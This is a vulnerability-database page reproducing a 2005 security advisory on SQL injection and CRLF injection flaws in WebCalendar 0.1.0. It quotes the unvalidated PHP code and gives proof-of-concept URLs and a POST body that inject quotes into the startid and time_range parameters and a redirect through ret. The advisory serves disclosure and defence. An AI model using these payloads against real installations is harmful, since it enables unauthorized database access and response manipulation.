Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

webCalSQL.txt

๐Ÿ—“๏ธย 02 Dec 2005ย 00:00:00Reported byย lwangTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 18ย Views

WebCalendar has SQL and CRLF Injection vulnerabilities in multiple PHP scripts allowing exploitation.

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`WebCalendar Multiple Vulnerabilities.  
  
Author: lwang (lwang at lwang.org)  
  
Publish Date: 2005-12-1  
  
Description:  
WebCalendar is a PHP application used to maintain a calendar for one or more persons and for a variety of purposes.   
In WebCalendar 0.1.0, activity_log.php and edit_report_handler.php are prone to SQL Injection attack, layers_toggle.php is vulnerable to CRLF Injection.  
  
Reference:   
http://vd.lwang.org/webcalendar_multiple_vulns.txt  
  
Vulnerability Analysis and Proof of Concept:  
1. SQL Injection  
in activity_log.php, parameter $startid does not validation.  
if ( ! empty ( $startid ) )  
$sql .= "AND webcal_entry_log.cal_log_id <= $startid ";  
PoC:  
http://victimhost/webcalendar/activity_log.php?startid=%2527  
http://victimhost/webcalendar/activity_log.php?startid=%27  
http://victimhost/webcalendar/activity_log.php?startid='  
  
in edit_report_handler.php  
PoC:  
POST the following variable to http://victimhost/webcalendar/edit_report_handler.php  
report_name=Unnamed%20Report&is_global=Y&show_in_trailer=Y&include_header=Y&time_range='&cat_id=1&allow_nav=Y&include_empty=Y&page_template=%26lt%3Bdl%26gt%3B%24%7Bdays%7D%26lt%3B%2Fdl%26gt%3B&day_template=%26lt%3Bdt%26gt%3B%26lt%3Bb%26gt%3B%24%7Bdate%7D%26lt%3B%2Fb%26gt%3B%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bdl%26gt%3B%24%7Bevents%7D%26lt%3B%2Fdl%26gt%3B%26lt%3B%2Fdd%26gt%3B&event_template=%26lt%3Bdt%26gt%3B%24%7Bname%7D%26lt%3B%2Fdt%26gt%3B%0A%26lt%3Bdd%26gt%3B%26lt%3Bb%26gt%3BDate%3A%26lt%3B%2Fb%26gt%3B%20%24%7Bdate%7D%26lt%3Bbr%20%2F%26gt%3B%0A%26lt%3Bb%26gt%3BTime%3A%26lt%3B%2Fb%26gt%3B%20%24%7Btime%7D%26lt%3Bbr%20%2F%26gt%3B%0A%24%7Bdescription%7D%26lt%3B%2Fdd%26gt%3B  
  
2. CRLF Injection  
in layers_toggle.php, parameter $ret does not validation.  
if ( empty ( $error ) ) {  
// Go back to where we where if we can figure it out.  
if ( strlen ( $ret ) )  
do_redirect ( $ret );  
else if ( ! empty ( $HTTP_REFERER ) )  
do_redirect ( $HTTP_REFERER );  
else  
send_to_preferred_view ();  
  
PoC:  
http://victimhost/webcalendar/layers_toggle.php?status=on&ret=[url_redirect_to]  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
02 Dec 2005 00:00Current
7.4High risk
Vulners AI Score7.4
webcalendar vulnerabilities sql injection crlf injection php application
18
.json
Report